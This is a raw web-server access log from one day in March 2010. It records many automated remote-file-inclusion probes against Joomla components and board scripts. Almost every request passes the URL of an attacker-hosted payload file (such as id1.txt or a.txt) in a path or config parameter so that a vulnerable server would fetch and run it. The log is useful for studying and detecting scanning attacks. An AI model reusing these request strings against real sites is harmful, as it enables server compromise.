58.150.99.144 - - [05/Mar/2010:05:54:54 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
62.140.23.24 - - [05/Mar/2010:06:03:14 -0800] "GET /logs/home.php?info.phphttp://www.zahirajans.com/v22/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.allattitudedoxies.com"
62.140.23.24 - - [05/Mar/2010:06:03:14 -0800] "GET /home.php?info.phphttp://www.zahirajans.com/v22/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:06:06:15 -0800] "GET /logs/access.log///bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
216.119.103.12 - - [05/Mar/2010:06:20:58 -0800] "GET /modifyform.html?code=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
216.119.103.12 - - [05/Mar/2010:06:20:58 -0800] "GET /logs//modifyform.html?code=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
216.119.103.12 - - [05/Mar/2010:06:20:59 -0800] "GET /logs/access.log%20%20//modifyform.html?code=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
188.93.10.36 - - [05/Mar/2010:06:33:10 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "allattitudedoxies.com"
188.93.10.36 - - [05/Mar/2010:06:33:10 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "allattitudedoxies.com"
188.93.10.36 - - [05/Mar/2010:06:33:10 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "allattitudedoxies.com"
216.119.103.12 - - [05/Mar/2010:06:33:32 -0800] "GET /logs/access.log//modifyform.html?code=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
67.195.110.166 - - [05/Mar/2010:06:34:06 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.allattitudedoxies.com"
67.195.110.166 - - [05/Mar/2010:06:34:06 -0800] "GET /tmp/?D=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.allattitudedoxies.com"
67.195.110.166 - - [05/Mar/2010:06:35:24 -0800] "GET /logs/access_100219.log HTTP/1.0" 200 2285414 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.allattitudedoxies.com"
173.212.202.130 - - [05/Mar/2010:06:36:56 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.212.202.130 - - [05/Mar/2010:06:36:56 -0800] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.212.202.130 - - [05/Mar/2010:06:36:56 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
163.13.224.70 - - [05/Mar/2010:06:50:19 -0800] "GET /logs//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
163.13.224.70 - - [05/Mar/2010:06:50:19 -0800] "GET /errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
163.13.224.70 - - [05/Mar/2010:06:50:19 -0800] "GET /logs/access.log%20%20//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.230.162.220 - - [05/Mar/2010:07:13:10 -0800] "GET /logs/access.log%20%20////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.230.162.220 - - [05/Mar/2010:07:13:10 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.230.162.220 - - [05/Mar/2010:07:13:10 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.230.162.220 - - [05/Mar/2010:07:13:15 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.230.162.220 - - [05/Mar/2010:07:13:15 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.230.162.220 - - [05/Mar/2010:07:13:15 -0800] "GET /logs/access.log%20%20////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:18:10 -0800] "GET /logs/access.log%20%20////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:18:10 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:18:10 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:18:33 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:18:33 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:18:33 -0800] "GET /logs/access.log%20%20////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:18:40 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:18:41 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:18:41 -0800] "GET /logs/access.log%20%20////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
216.193.197.59 - - [05/Mar/2010:07:23:24 -0800] "GET /src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
216.193.197.59 - - [05/Mar/2010:07:23:24 -0800] "GET /logs/access.log%20%20/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
216.193.197.59 - - [05/Mar/2010:07:23:24 -0800] "GET /logs/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:23:29 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:23:29 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:23:29 -0800] "GET /logs/access.log////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:23:43 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:23:43 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:23:43 -0800] "GET /logs/access.log////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:23:44 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:23:44 -0800] "GET /logs/access.log////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
118.168.12.40 - - [05/Mar/2010:07:23:44 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
220.232.237.122 - - [05/Mar/2010:07:28:35 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://walangz.webs.com/botz/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
220.232.237.122 - - [05/Mar/2010:07:28:35 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://walangz.webs.com/botz/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
220.232.237.122 - - [05/Mar/2010:07:28:35 -0800] "GET /logs/access_091002.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://walangz.webs.com/botz/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:28:55 -0800] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:28:55 -0800] "GET ///////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:28:55 -0800] "GET /logs////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 1664 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:29:43 -0800] "GET ///////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:29:43 -0800] "GET /logs////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 1664 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:29:43 -0800] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:31:02 -0800] "GET /logs/access.log%20%20///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:31:02 -0800] "GET //bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:31:02 -0800] "GET /logs///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:31:58 -0800] "GET //bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:31:58 -0800] "GET /logs///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:32:00 -0800] "GET /logs/access.log%20%20///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:32:12 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:32:12 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:32:12 -0800] "GET /logs/access.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:32:27 -0800] "GET //bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:32:30 -0800] "GET /logs///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:32:33 -0800] "GET /logs/access.log%20%20///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.95.78.56 - - [05/Mar/2010:07:32:37 -0800] "GET /src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.95.78.56 - - [05/Mar/2010:07:32:37 -0800] "GET /logs/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.95.78.56 - - [05/Mar/2010:07:32:41 -0800] "GET /logs/access.log%20%20/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:33:07 -0800] "GET /logs///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:33:07 -0800] "GET /logs/access.log%20%20///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:33:10 -0800] "GET //bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
216.193.197.59 - - [05/Mar/2010:07:33:28 -0800] "GET /logs/access.log/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:33:32 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:33:33 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:33:33 -0800] "GET /logs/access.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:33:38 -0800] "GET //bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:33:38 -0800] "GET /logs/access.log%20%20///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:33:41 -0800] "GET /logs///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
121.101.214.54 - - [05/Mar/2010:07:36:15 -0800] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
121.101.214.54 - - [05/Mar/2010:07:36:15 -0800] "GET ///////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
121.101.214.54 - - [05/Mar/2010:07:36:15 -0800] "GET /logs////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 1664 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:07:38:06 -0800] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:07:38:06 -0800] "GET /logs/access.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:07:38:06 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
121.101.214.54 - - [05/Mar/2010:07:38:10 -0800] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
121.101.214.54 - - [05/Mar/2010:07:38:10 -0800] "GET ///////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
121.101.214.54 - - [05/Mar/2010:07:38:10 -0800] "GET /logs////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 1664 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
94.124.120.61 - - [05/Mar/2010:07:39:31 -0800] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
94.124.120.61 - - [05/Mar/2010:07:39:31 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
94.124.120.61 - - [05/Mar/2010:07:39:31 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
88.191.94.188 - - [05/Mar/2010:07:40:30 -0800] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
88.191.94.188 - - [05/Mar/2010:07:40:30 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
88.191.94.188 - - [05/Mar/2010:07:40:30 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:07:45:11 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:07:45:11 -0800] "GET /logs/access.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:07:45:11 -0800] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:48:58 -0800] "GET /logs/access.log%20%20//bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:48:58 -0800] "GET /bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:48:59 -0800] "GET /logs//bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:49:01 -0800] "GET /bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:49:01 -0800] "GET /logs/access.log%20%20//bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:07:49:01 -0800] "GET /logs//bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
121.101.214.54 - - [05/Mar/2010:07:49:23 -0800] "GET /logs/access.log////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
121.101.214.54 - - [05/Mar/2010:07:49:23 -0800] "GET /logs////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 1664 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
121.101.214.54 - - [05/Mar/2010:07:49:23 -0800] "GET ///////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
123.143.29.250 - - [05/Mar/2010:07:52:46 -0800] "GET /logs//bbs////////memo.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
123.143.29.250 - - [05/Mar/2010:07:52:47 -0800] "GET /logs/access.log//bbs////////memo.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
123.143.29.250 - - [05/Mar/2010:07:52:47 -0800] "GET /bbs////////memo.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:53:20 -0800] "GET /logs////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 1664 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:53:20 -0800] "GET ///////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:07:53:21 -0800] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:07:55:24 -0800] "GET /logs/access.log//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:07:57:46 -0800] "GET /logs///bbs//write_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:07:57:46 -0800] "GET //bbs//write_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:07:57:46 -0800] "GET /logs/access.log%20%20///bbs//write_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:07:59:25 -0800] "GET /logs/access.log//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
67.218.116.130 - - [05/Mar/2010:08:04:38 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.allattitudedoxies.com"
